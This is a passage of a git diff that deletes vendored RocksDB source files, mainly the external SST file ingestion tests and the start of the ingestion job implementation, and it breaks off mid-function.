-#else  // ROCKSDB_LITE
-
-Status SuggestCompactRange(DB* db, ColumnFamilyHandle* column_family,
-                           const Slice* begin, const Slice* end) {
-  return Status::NotSupported("Not supported in RocksDB LITE");
-}
-
-Status PromoteL0(DB* db, ColumnFamilyHandle* column_family, int target_level) {
-  return Status::NotSupported("Not supported in RocksDB LITE");
-}
-
-#endif  // ROCKSDB_LITE
-
-Status SuggestCompactRange(DB* db, const Slice* begin, const Slice* end) {
-  return SuggestCompactRange(db, db->DefaultColumnFamily(), begin, end);
-}
-
-}  // namespace experimental
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/external_sst_file_basic_test.cc b/thirdparty/rocksdb/db/external_sst_file_basic_test.cc
deleted file mode 100644
index 534e8a0..0000000
--- a/thirdparty/rocksdb/db/external_sst_file_basic_test.cc
+++ /dev/null
@@ -1,617 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include <functional>
-
-#include "db/db_test_util.h"
-#include "port/port.h"
-#include "port/stack_trace.h"
-#include "rocksdb/sst_file_writer.h"
-#include "util/testutil.h"
-
-namespace rocksdb {
-
-#ifndef ROCKSDB_LITE
-class ExternalSSTFileBasicTest : public DBTestBase {
- public:
-  ExternalSSTFileBasicTest() : DBTestBase("/external_sst_file_test") {
-    sst_files_dir_ = dbname_ + "/sst_files/";
-    DestroyAndRecreateExternalSSTFilesDir();
-  }
-
-  void DestroyAndRecreateExternalSSTFilesDir() {
-    test::DestroyDir(env_, sst_files_dir_);
-    env_->CreateDir(sst_files_dir_);
-  }
-
-  Status DeprecatedAddFile(const std::vector<std::string>& files,
-                           bool move_files = false,
-                           bool skip_snapshot_check = false) {
-    IngestExternalFileOptions opts;
-    opts.move_files = move_files;
-    opts.snapshot_consistency = !skip_snapshot_check;
-    opts.allow_global_seqno = false;
-    opts.allow_blocking_flush = false;
-    return db_->IngestExternalFile(files, opts);
-  }
-
-  Status GenerateAndAddExternalFile(
-      const Options options, std::vector<int> keys,
-      const std::vector<ValueType>& value_types, int file_id,
-      std::map<std::string, std::string>* true_data) {
-    assert(value_types.size() == 1 || keys.size() == value_types.size());
-    std::string file_path = sst_files_dir_ + ToString(file_id);
-    SstFileWriter sst_file_writer(EnvOptions(), options);
-
-    Status s = sst_file_writer.Open(file_path);
-    if (!s.ok()) {
-      return s;
-    }
-    for (size_t i = 0; i < keys.size(); i++) {
-      std::string key = Key(keys[i]);
-      std::string value = Key(keys[i]) + ToString(file_id);
-      ValueType value_type =
-          (value_types.size() == 1 ? value_types[0] : value_types[i]);
-      switch (value_type) {
-        case ValueType::kTypeValue:
-          s = sst_file_writer.Put(key, value);
-          (*true_data)[key] = value;
-          break;
-        case ValueType::kTypeMerge:
-          s = sst_file_writer.Merge(key, value);
-          // we only use TestPutOperator in this test
-          (*true_data)[key] = value;
-          break;
-        case ValueType::kTypeDeletion:
-          s = sst_file_writer.Delete(key);
-          true_data->erase(key);
-          break;
-        default:
-          return Status::InvalidArgument("Value type is not supported");
-      }
-      if (!s.ok()) {
-        sst_file_writer.Finish();
-        return s;
-      }
-    }
-    s = sst_file_writer.Finish();
-
-    if (s.ok()) {
-      IngestExternalFileOptions ifo;
-      ifo.allow_global_seqno = true;
-      s = db_->IngestExternalFile({file_path}, ifo);
-    }
-    return s;
-  }
-
-  Status GenerateAndAddExternalFile(
-      const Options options, std::vector<int> keys, const ValueType value_type,
-      int file_id, std::map<std::string, std::string>* true_data) {
-    return GenerateAndAddExternalFile(options, keys,
-                                      std::vector<ValueType>(1, value_type),
-                                      file_id, true_data);
-  }
-
-  ~ExternalSSTFileBasicTest() { test::DestroyDir(env_, sst_files_dir_); }
-
- protected:
-  std::string sst_files_dir_;
-};
-
-TEST_F(ExternalSSTFileBasicTest, Basic) {
-  Options options = CurrentOptions();
-
-  SstFileWriter sst_file_writer(EnvOptions(), options);
-
-  // Current file size should be 0 after sst_file_writer init and before open a
-  // file.
-  ASSERT_EQ(sst_file_writer.FileSize(), 0);
-
-  // file1.sst (0 => 99)
-  std::string file1 = sst_files_dir_ + "file1.sst";
-  ASSERT_OK(sst_file_writer.Open(file1));
-  for (int k = 0; k < 100; k++) {
-    ASSERT_OK(sst_file_writer.Put(Key(k), Key(k) + "_val"));
-  }
-  ExternalSstFileInfo file1_info;
-  Status s = sst_file_writer.Finish(&file1_info);
-  ASSERT_TRUE(s.ok()) << s.ToString();
-
-  // Current file size should be non-zero after success write.
-  ASSERT_GT(sst_file_writer.FileSize(), 0);
-
-  ASSERT_EQ(file1_info.file_path, file1);
-  ASSERT_EQ(file1_info.num_entries, 100);
-  ASSERT_EQ(file1_info.smallest_key, Key(0));
-  ASSERT_EQ(file1_info.largest_key, Key(99));
-  // sst_file_writer already finished, cannot add this value
-  s = sst_file_writer.Put(Key(100), "bad_val");
-  ASSERT_FALSE(s.ok()) << s.ToString();
-
-  DestroyAndReopen(options);
-  // Add file using file path
-  s = DeprecatedAddFile({file1});
-  ASSERT_TRUE(s.ok()) << s.ToString();
-  ASSERT_EQ(db_->GetLatestSequenceNumber(), 0U);
-  for (int k = 0; k < 100; k++) {
-    ASSERT_EQ(Get(Key(k)), Key(k) + "_val");
-  }
-
-  DestroyAndRecreateExternalSSTFilesDir();
-}
-
-TEST_F(ExternalSSTFileBasicTest, NoCopy) {
-  Options options = CurrentOptions();
-  const ImmutableCFOptions ioptions(options);
-
-  SstFileWriter sst_file_writer(EnvOptions(), options);
-
-  // file1.sst (0 => 99)
-  std::string file1 = sst_files_dir_ + "file1.sst";
-  ASSERT_OK(sst_file_writer.Open(file1));
-  for (int k = 0; k < 100; k++) {
-    ASSERT_OK(sst_file_writer.Put(Key(k), Key(k) + "_val"));
-  }
-  ExternalSstFileInfo file1_info;
-  Status s = sst_file_writer.Finish(&file1_info);
-  ASSERT_TRUE(s.ok()) << s.ToString();
-  ASSERT_EQ(file1_info.file_path, file1);
-  ASSERT_EQ(file1_info.num_entries, 100);
-  ASSERT_EQ(file1_info.smallest_key, Key(0));
-  ASSERT_EQ(file1_info.largest_key, Key(99));
-
-  // file2.sst (100 => 299)
-  std::string file2 = sst_files_dir_ + "file2.sst";
-  ASSERT_OK(sst_file_writer.Open(file2));
-  for (int k = 100; k < 300; k++) {
-    ASSERT_OK(sst_file_writer.Put(Key(k), Key(k) + "_val"));
-  }
-  ExternalSstFileInfo file2_info;
-  s = sst_file_writer.Finish(&file2_info);
-  ASSERT_TRUE(s.ok()) << s.ToString();
-  ASSERT_EQ(file2_info.file_path, file2);
-  ASSERT_EQ(file2_info.num_entries, 200);
-  ASSERT_EQ(file2_info.smallest_key, Key(100));
-  ASSERT_EQ(file2_info.largest_key, Key(299));
-
-  // file3.sst (110 => 124) .. overlap with file2.sst
-  std::string file3 = sst_files_dir_ + "file3.sst";
-  ASSERT_OK(sst_file_writer.Open(file3));
-  for (int k = 110; k < 125; k++) {
-    ASSERT_OK(sst_file_writer.Put(Key(k), Key(k) + "_val_overlap"));
-  }
-  ExternalSstFileInfo file3_info;
-  s = sst_file_writer.Finish(&file3_info);
-  ASSERT_TRUE(s.ok()) << s.ToString();
-  ASSERT_EQ(file3_info.file_path, file3);
-  ASSERT_EQ(file3_info.num_entries, 15);
-  ASSERT_EQ(file3_info.smallest_key, Key(110));
-  ASSERT_EQ(file3_info.largest_key, Key(124));
-  s = DeprecatedAddFile({file1}, true /* move file */);
-  ASSERT_TRUE(s.ok()) << s.ToString();
-  ASSERT_EQ(Status::NotFound(), env_->FileExists(file1));
-
-  s = DeprecatedAddFile({file2}, false /* copy file */);
-  ASSERT_TRUE(s.ok()) << s.ToString();
-  ASSERT_OK(env_->FileExists(file2));
-
-  // This file have overlapping values with the existing data
-  s = DeprecatedAddFile({file2}, true /* move file */);
-  ASSERT_FALSE(s.ok()) << s.ToString();
-  ASSERT_OK(env_->FileExists(file3));
-
-  for (int k = 0; k < 300; k++) {
-    ASSERT_EQ(Get(Key(k)), Key(k) + "_val");
-  }
-}
-
-TEST_F(ExternalSSTFileBasicTest, IngestFileWithGlobalSeqnoPickedSeqno) {
-  do {
-    Options options = CurrentOptions();
-    DestroyAndReopen(options);
-    std::map<std::string, std::string> true_data;
-
-    int file_id = 1;
-
-    ASSERT_OK(GenerateAndAddExternalFile(options, {1, 2, 3, 4, 5, 6},
-                                         ValueType::kTypeValue, file_id++,
-                                         &true_data));
-    // File dont overwrite any keys, No seqno needed
-    ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), 0);
-
-    ASSERT_OK(GenerateAndAddExternalFile(options, {10, 11, 12, 13},
-                                         ValueType::kTypeValue, file_id++,
-
-                                         &true_data));
-    // File dont overwrite any keys, No seqno needed
-    ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), 0);
-
-    ASSERT_OK(GenerateAndAddExternalFile(
-        options, {1, 4, 6}, ValueType::kTypeValue, file_id++, &true_data));
-    // File overwrite some keys, a seqno will be assigned
-    ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), 1);
-
-    ASSERT_OK(GenerateAndAddExternalFile(
-        options, {11, 15, 19}, ValueType::kTypeValue, file_id++, &true_data));
-    // File overwrite some keys, a seqno will be assigned
-    ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), 2);
-
-    ASSERT_OK(GenerateAndAddExternalFile(
-        options, {120, 130}, ValueType::kTypeValue, file_id++, &true_data));
-    // File dont overwrite any keys, No seqno needed
-    ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), 2);
-
-    ASSERT_OK(GenerateAndAddExternalFile(
-        options, {1, 130}, ValueType::kTypeValue, file_id++, &true_data));
-    // File overwrite some keys, a seqno will be assigned
-    ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), 3);
-
-    // Write some keys through normal write path
-    for (int i = 0; i < 50; i++) {
-      ASSERT_OK(Put(Key(i), "memtable"));
-      true_data[Key(i)] = "memtable";
-    }
-    SequenceNumber last_seqno = dbfull()->GetLatestSequenceNumber();
-
-    ASSERT_OK(GenerateAndAddExternalFile(
-        options, {60, 61, 62}, ValueType::kTypeValue, file_id++, &true_data));
-    // File dont overwrite any keys, No seqno needed
-    ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), last_seqno);
-
-    ASSERT_OK(GenerateAndAddExternalFile(
-        options, {40, 41, 42}, ValueType::kTypeValue, file_id++, &true_data));
-    // File overwrite some keys, a seqno will be assigned
-    ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), last_seqno + 1);
-
-    ASSERT_OK(GenerateAndAddExternalFile(
-        options, {20, 30, 40}, ValueType::kTypeValue, file_id++, &true_data));
-    // File overwrite some keys, a seqno will be assigned
-    ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), last_seqno + 2);
-
-    const Snapshot* snapshot = db_->GetSnapshot();
-
-    // We will need a seqno for the file regardless if the file overwrite
-    // keys in the DB or not because we have a snapshot
-    ASSERT_OK(GenerateAndAddExternalFile(
-        options, {1000, 1002}, ValueType::kTypeValue, file_id++, &true_data));
-    // A global seqno will be assigned anyway because of the snapshot
-    ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), last_seqno + 3);
-
-    ASSERT_OK(GenerateAndAddExternalFile(
-        options, {2000, 3002}, ValueType::kTypeValue, file_id++, &true_data));
-    // A global seqno will be assigned anyway because of the snapshot
-    ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), last_seqno + 4);
-
-    ASSERT_OK(GenerateAndAddExternalFile(options, {1, 20, 40, 100, 150},
-                                         ValueType::kTypeValue, file_id++,
-                                         &true_data));
-    // A global seqno will be assigned anyway because of the snapshot
-    ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), last_seqno + 5);
-
-    db_->ReleaseSnapshot(snapshot);
-
-    ASSERT_OK(GenerateAndAddExternalFile(
-        options, {5000, 5001}, ValueType::kTypeValue, file_id++, &true_data));
-    // No snapshot anymore, no need to assign a seqno
-    ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), last_seqno + 5);
-
-    size_t kcnt = 0;
-    VerifyDBFromMap(true_data, &kcnt, false);
-  } while (ChangeCompactOptions());
-}
-
-TEST_F(ExternalSSTFileBasicTest, IngestFileWithMultipleValueType) {
-  do {
-    Options options = CurrentOptions();
-    options.merge_operator.reset(new TestPutOperator());
-    DestroyAndReopen(options);
-    std::map<std::string, std::string> true_data;
-
-    int file_id = 1;
-
-    ASSERT_OK(GenerateAndAddExternalFile(options, {1, 2, 3, 4, 5, 6},
-                                         ValueType::kTypeValue, file_id++,
-                                         &true_data));
-    // File dont overwrite any keys, No seqno needed
-    ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), 0);
-
-    ASSERT_OK(GenerateAndAddExternalFile(options, {10, 11, 12, 13},
-                                         ValueType::kTypeValue, file_id++,
-
-                                         &true_data));
-    // File dont overwrite any keys, No seqno needed
-    ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), 0);
-
-    ASSERT_OK(GenerateAndAddExternalFile(
-        options, {1, 4, 6}, ValueType::kTypeMerge, file_id++, &true_data));
-    // File overwrite some keys, a seqno will be assigned
-    ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), 1);
-
-    ASSERT_OK(GenerateAndAddExternalFile(options, {11, 15, 19},
-                                         ValueType::kTypeDeletion, file_id++,
-                                         &true_data));
-    // File overwrite some keys, a seqno will be assigned
-    ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), 2);
-
-    ASSERT_OK(GenerateAndAddExternalFile(
-        options, {120, 130}, ValueType::kTypeMerge, file_id++, &true_data));
-    // File dont overwrite any keys, No seqno needed
-    ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), 2);
-
-    ASSERT_OK(GenerateAndAddExternalFile(
-        options, {1, 130}, ValueType::kTypeDeletion, file_id++, &true_data));
-    // File overwrite some keys, a seqno will be assigned
-    ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), 3);
-
-    // Write some keys through normal write path
-    for (int i = 0; i < 50; i++) {
-      ASSERT_OK(Put(Key(i), "memtable"));
-      true_data[Key(i)] = "memtable";
-    }
-    SequenceNumber last_seqno = dbfull()->GetLatestSequenceNumber();
-
-    ASSERT_OK(GenerateAndAddExternalFile(
-        options, {60, 61, 62}, ValueType::kTypeValue, file_id++, &true_data));
-    // File dont overwrite any keys, No seqno needed
-    ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), last_seqno);
-
-    ASSERT_OK(GenerateAndAddExternalFile(
-        options, {40, 41, 42}, ValueType::kTypeMerge, file_id++, &true_data));
-    // File overwrite some keys, a seqno will be assigned
-    ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), last_seqno + 1);
-
-    ASSERT_OK(GenerateAndAddExternalFile(options, {20, 30, 40},
-                                         ValueType::kTypeDeletion, file_id++,
-                                         &true_data));
-    // File overwrite some keys, a seqno will be assigned
-    ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), last_seqno + 2);
-
-    const Snapshot* snapshot = db_->GetSnapshot();
-
-    // We will need a seqno for the file regardless if the file overwrite
-    // keys in the DB or not because we have a snapshot
-    ASSERT_OK(GenerateAndAddExternalFile(
-        options, {1000, 1002}, ValueType::kTypeMerge, file_id++, &true_data));
-    // A global seqno will be assigned anyway because of the snapshot
-    ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), last_seqno + 3);
-
-    ASSERT_OK(GenerateAndAddExternalFile(
-        options, {2000, 3002}, ValueType::kTypeMerge, file_id++, &true_data));
-    // A global seqno will be assigned anyway because of the snapshot
-    ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), last_seqno + 4);
-
-    ASSERT_OK(GenerateAndAddExternalFile(options, {1, 20, 40, 100, 150},
-                                         ValueType::kTypeMerge, file_id++,
-                                         &true_data));
-    // A global seqno will be assigned anyway because of the snapshot
-    ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), last_seqno + 5);
-
-    db_->ReleaseSnapshot(snapshot);
-
-    ASSERT_OK(GenerateAndAddExternalFile(
-        options, {5000, 5001}, ValueType::kTypeValue, file_id++, &true_data));
-    // No snapshot anymore, no need to assign a seqno
-    ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), last_seqno + 5);
-
-    size_t kcnt = 0;
-    VerifyDBFromMap(true_data, &kcnt, false);
-  } while (ChangeCompactOptions());
-}
-
-TEST_F(ExternalSSTFileBasicTest, IngestFileWithMixedValueType) {
-  do {
-    Options options = CurrentOptions();
-    options.merge_operator.reset(new TestPutOperator());
-    DestroyAndReopen(options);
-    std::map<std::string, std::string> true_data;
-
-    int file_id = 1;
-
-    ASSERT_OK(GenerateAndAddExternalFile(
-        options, {1, 2, 3, 4, 5, 6},
-        {ValueType::kTypeValue, ValueType::kTypeMerge, ValueType::kTypeValue,
-         ValueType::kTypeMerge, ValueType::kTypeValue, ValueType::kTypeMerge},
-        file_id++, &true_data));
-    // File dont overwrite any keys, No seqno needed
-    ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), 0);
-
-    ASSERT_OK(GenerateAndAddExternalFile(
-        options, {10, 11, 12, 13},
-        {ValueType::kTypeValue, ValueType::kTypeMerge, ValueType::kTypeValue,
-         ValueType::kTypeMerge},
-        file_id++, &true_data));
-    // File dont overwrite any keys, No seqno needed
-    ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), 0);
-
-    ASSERT_OK(GenerateAndAddExternalFile(
-        options, {1, 4, 6}, {ValueType::kTypeDeletion, ValueType::kTypeValue,
-                             ValueType::kTypeMerge},
-        file_id++, &true_data));
-    // File overwrite some keys, a seqno will be assigned
-    ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), 1);
-
-    ASSERT_OK(GenerateAndAddExternalFile(
-        options, {11, 15, 19}, {ValueType::kTypeDeletion, ValueType::kTypeMerge,
-                                ValueType::kTypeValue},
-        file_id++, &true_data));
-    // File overwrite some keys, a seqno will be assigned
-    ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), 2);
-
-    ASSERT_OK(GenerateAndAddExternalFile(
-        options, {120, 130}, {ValueType::kTypeValue, ValueType::kTypeMerge},
-        file_id++, &true_data));
-    // File dont overwrite any keys, No seqno needed
-    ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), 2);
-
-    ASSERT_OK(GenerateAndAddExternalFile(
-        options, {1, 130}, {ValueType::kTypeMerge, ValueType::kTypeDeletion},
-        file_id++, &true_data));
-    // File overwrite some keys, a seqno will be assigned
-    ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), 3);
-
-    // Write some keys through normal write path
-    for (int i = 0; i < 50; i++) {
-      ASSERT_OK(Put(Key(i), "memtable"));
-      true_data[Key(i)] = "memtable";
-    }
-    SequenceNumber last_seqno = dbfull()->GetLatestSequenceNumber();
-
-    ASSERT_OK(GenerateAndAddExternalFile(
-        options, {60, 61, 62},
-        {ValueType::kTypeValue, ValueType::kTypeMerge, ValueType::kTypeValue},
-        file_id++, &true_data));
-    // File dont overwrite any keys, No seqno needed
-    ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), last_seqno);
-
-    ASSERT_OK(GenerateAndAddExternalFile(
-        options, {40, 41, 42}, {ValueType::kTypeValue, ValueType::kTypeDeletion,
-                                ValueType::kTypeDeletion},
-        file_id++, &true_data));
-    // File overwrite some keys, a seqno will be assigned
-    ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), last_seqno + 1);
-
-    ASSERT_OK(GenerateAndAddExternalFile(
-        options, {20, 30, 40},
-        {ValueType::kTypeDeletion, ValueType::kTypeDeletion,
-         ValueType::kTypeDeletion},
-        file_id++, &true_data));
-    // File overwrite some keys, a seqno will be assigned
-    ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), last_seqno + 2);
-
-    const Snapshot* snapshot = db_->GetSnapshot();
-
-    // We will need a seqno for the file regardless if the file overwrite
-    // keys in the DB or not because we have a snapshot
-    ASSERT_OK(GenerateAndAddExternalFile(
-        options, {1000, 1002}, {ValueType::kTypeValue, ValueType::kTypeMerge},
-        file_id++, &true_data));
-    // A global seqno will be assigned anyway because of the snapshot
-    ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), last_seqno + 3);
-
-    ASSERT_OK(GenerateAndAddExternalFile(
-        options, {2000, 3002}, {ValueType::kTypeValue, ValueType::kTypeMerge},
-        file_id++, &true_data));
-    // A global seqno will be assigned anyway because of the snapshot
-    ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), last_seqno + 4);
-
-    ASSERT_OK(GenerateAndAddExternalFile(
-        options, {1, 20, 40, 100, 150},
-        {ValueType::kTypeDeletion, ValueType::kTypeDeletion,
-         ValueType::kTypeValue, ValueType::kTypeMerge, ValueType::kTypeMerge},
-        file_id++, &true_data));
-    // A global seqno will be assigned anyway because of the snapshot
-    ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), last_seqno + 5);
-
-    db_->ReleaseSnapshot(snapshot);
-
-    ASSERT_OK(GenerateAndAddExternalFile(
-        options, {5000, 5001}, {ValueType::kTypeValue, ValueType::kTypeMerge},
-        file_id++, &true_data));
-    // No snapshot anymore, no need to assign a seqno
-    ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), last_seqno + 5);
-
-    size_t kcnt = 0;
-    VerifyDBFromMap(true_data, &kcnt, false);
-  } while (ChangeCompactOptions());
-}
-
-TEST_F(ExternalSSTFileBasicTest, FadviseTrigger) {
-  Options options = CurrentOptions();
-  const int kNumKeys = 10000;
-
-  size_t total_fadvised_bytes = 0;
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "SstFileWriter::Rep::InvalidatePageCache", [&](void* arg) {
-        size_t fadvise_size = *(reinterpret_cast<size_t*>(arg));
-        total_fadvised_bytes += fadvise_size;
-      });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  std::unique_ptr<SstFileWriter> sst_file_writer;
-
-  std::string sst_file_path = sst_files_dir_ + "file_fadvise_disable.sst";
-  sst_file_writer.reset(
-      new SstFileWriter(EnvOptions(), options, nullptr, false));
-  ASSERT_OK(sst_file_writer->Open(sst_file_path));
-  for (int i = 0; i < kNumKeys; i++) {
-    ASSERT_OK(sst_file_writer->Put(Key(i), Key(i)));
-  }
-  ASSERT_OK(sst_file_writer->Finish());
-  // fadvise disabled
-  ASSERT_EQ(total_fadvised_bytes, 0);
-
-  sst_file_path = sst_files_dir_ + "file_fadvise_enable.sst";
-  sst_file_writer.reset(
-      new SstFileWriter(EnvOptions(), options, nullptr, true));
-  ASSERT_OK(sst_file_writer->Open(sst_file_path));
-  for (int i = 0; i < kNumKeys; i++) {
-    ASSERT_OK(sst_file_writer->Put(Key(i), Key(i)));
-  }
-  ASSERT_OK(sst_file_writer->Finish());
-  // fadvise enabled
-  ASSERT_EQ(total_fadvised_bytes, sst_file_writer->FileSize());
-  ASSERT_GT(total_fadvised_bytes, 0);
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-
-TEST_F(ExternalSSTFileBasicTest, IngestionWithRangeDeletions) {
-  Options options = CurrentOptions();
-  options.disable_auto_compactions = true;
-  Reopen(options);
-
-  std::map<std::string, std::string> true_data;
-  int file_id = 1;
-  // prevent range deletions from being dropped due to becoming obsolete.
-  const Snapshot* snapshot = db_->GetSnapshot();
-
-  // range del [0, 50) in L0 file, [50, 100) in memtable
-  for (int i = 0; i < 2; i++) {
-    if (i == 1) {
-      db_->Flush(FlushOptions());
-    }
-    ASSERT_OK(db_->DeleteRange(WriteOptions(), db_->DefaultColumnFamily(),
-                               Key(50 * i), Key(50 * (i + 1))));
-  }
-  ASSERT_EQ(1, NumTableFilesAtLevel(0));
-
-  // overlaps with L0 file but not memtable, so flush is skipped
-  SequenceNumber last_seqno = dbfull()->GetLatestSequenceNumber();
-  ASSERT_OK(GenerateAndAddExternalFile(
-      options, {10, 40}, {ValueType::kTypeValue, ValueType::kTypeValue},
-      file_id++, &true_data));
-  ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), ++last_seqno);
-  ASSERT_EQ(2, NumTableFilesAtLevel(0));
-
-  // overlaps with memtable, so flush is triggered (thus file count increases by
-  // two at this step).
-  ASSERT_OK(GenerateAndAddExternalFile(
-      options, {50, 90}, {ValueType::kTypeValue, ValueType::kTypeValue},
-      file_id++, &true_data));
-  ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), ++last_seqno);
-  ASSERT_EQ(4, NumTableFilesAtLevel(0));
-
-  // snapshot unneeded now that both range deletions are persisted
-  db_->ReleaseSnapshot(snapshot);
-
-  // overlaps with nothing, so places at bottom level and skips incrementing
-  // seqnum.
-  ASSERT_OK(GenerateAndAddExternalFile(
-      options, {101, 125}, {ValueType::kTypeValue, ValueType::kTypeValue},
-      file_id++, &true_data));
-  ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), last_seqno);
-  ASSERT_EQ(4, NumTableFilesAtLevel(0));
-  ASSERT_EQ(1, NumTableFilesAtLevel(options.num_levels - 1));
-}
-
-#endif  // ROCKSDB_LITE
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  rocksdb::port::InstallStackTraceHandler();
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/external_sst_file_ingestion_job.cc b/thirdparty/rocksdb/db/external_sst_file_ingestion_job.cc
deleted file mode 100644
index 58fa354..0000000
--- a/thirdparty/rocksdb/db/external_sst_file_ingestion_job.cc
+++ /dev/null
@@ -1,665 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#include "db/external_sst_file_ingestion_job.h"
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include <inttypes.h>
-#include <algorithm>
-#include <string>
-#include <vector>
-
-#include "db/version_edit.h"
-#include "table/merging_iterator.h"
-#include "table/scoped_arena_iterator.h"
-#include "table/sst_file_writer_collectors.h"
-#include "table/table_builder.h"
-#include "util/file_reader_writer.h"
-#include "util/file_util.h"
-#include "util/stop_watch.h"
-#include "util/sync_point.h"
-
-namespace rocksdb {
-
-Status ExternalSstFileIngestionJob::Prepare(
-    const std::vector<std::string>& external_files_paths) {
-  Status status;
-
-  // Read the information of files we are ingesting
-  for (const std::string& file_path : external_files_paths) {
-    IngestedFileInfo file_to_ingest;
-    status = GetIngestedFileInfo(file_path, &file_to_ingest);
-    if (!status.ok()) {
-      return status;
-    }
-    files_to_ingest_.push_back(file_to_ingest);
-  }
-
-  for (const IngestedFileInfo& f : files_to_ingest_) {
-    if (f.cf_id !=
-            TablePropertiesCollectorFactory::Context::kUnknownColumnFamily &&
-        f.cf_id != cfd_->GetID()) {
-      return Status::InvalidArgument(
-          "External file column family id dont match");
-    }
-  }
-
-  const Comparator* ucmp = cfd_->internal_comparator().user_comparator();
-  auto num_files = files_to_ingest_.size();
-  if (num_files == 0) {
-    return Status::InvalidArgument("The list of files is empty");
-  } else if (num_files > 1) {
-    // Verify that passed files dont have overlapping ranges
-    autovector<const IngestedFileInfo*> sorted_files;
-    for (size_t i = 0; i < num_files; i++) {
-      sorted_files.push_back(&files_to_ingest_[i]);
-    }
-
-    std::sort(
-        sorted_files.begin(), sorted_files.end(),
-        [&ucmp](const IngestedFileInfo* info1, const IngestedFileInfo* info2) {
-          return ucmp->Compare(info1->smallest_user_key,
-                               info2->smallest_user_key) < 0;
-        });
-
-    for (size_t i = 0; i < num_files - 1; i++) {
-      if (ucmp->Compare(sorted_files[i]->largest_user_key,
-                        sorted_files[i + 1]->smallest_user_key) >= 0) {
-        return Status::NotSupported("Files have overlapping ranges");
-      }
-    }
-  }
-
-  for (IngestedFileInfo& f : files_to_ingest_) {
-    if (f.num_entries == 0) {
-      return Status::InvalidArgument("File contain no entries");
-    }
-
-    if (!f.smallest_internal_key().Valid() ||
-        !f.largest_internal_key().Valid()) {
-      return Status::Corruption("Generated table have corrupted keys");
-    }
-  }
-
-  // Copy/Move external files into DB
-  for (IngestedFileInfo& f : files_to_ingest_) {
-    f.fd = FileDescriptor(versions_->NewFileNumber(), 0, f.file_size);
-
-    const std::string path_outside_db = f.external_file_path;
-    const std::string path_inside_db =
-        TableFileName(db_options_.db_paths, f.fd.GetNumber(), f.fd.GetPathId());
-
-    if (ingestion_options_.move_files) {
-      status = env_->LinkFile(path_outside_db, path_inside_db);
-      if (status.IsNotSupported()) {
-        // Original file is on a different FS, use copy instead of hard linking
-        status = CopyFile(env_, path_outside_db, path_inside_db, 0,
-                          db_options_.use_fsync);
-      }
-    } else {
-      status = CopyFile(env_, path_outside_db, path_inside_db, 0,
-                        db_options_.use_fsync);
-    }
-    TEST_SYNC_POINT("DBImpl::AddFile:FileCopied");
-    if (!status.ok()) {
-      break;
-    }
-    f.internal_file_path = path_inside_db;
-  }
-
-  if (!status.ok()) {
-    // We failed, remove all files that we copied into the db
-    for (IngestedFileInfo& f : files_to_ingest_) {
-      if (f.internal_file_path == "") {
-        break;
-      }
-      Status s = env_->DeleteFile(f.internal_file_path);
-      if (!s.ok()) {
-        ROCKS_LOG_WARN(db_options_.info_log,
-                       "AddFile() clean up for file %s failed : %s",
-                       f.internal_file_path.c_str(), s.ToString().c_str());
-      }
-    }
-  }
-
-  return status;
-}
-
-Status ExternalSstFileIngestionJob::NeedsFlush(bool* flush_needed) {
-  SuperVersion* super_version = cfd_->GetSuperVersion();
-  Status status =
-      IngestedFilesOverlapWithMemtables(super_version, flush_needed);
-
-  if (status.ok() && *flush_needed &&
-      !ingestion_options_.allow_blocking_flush) {
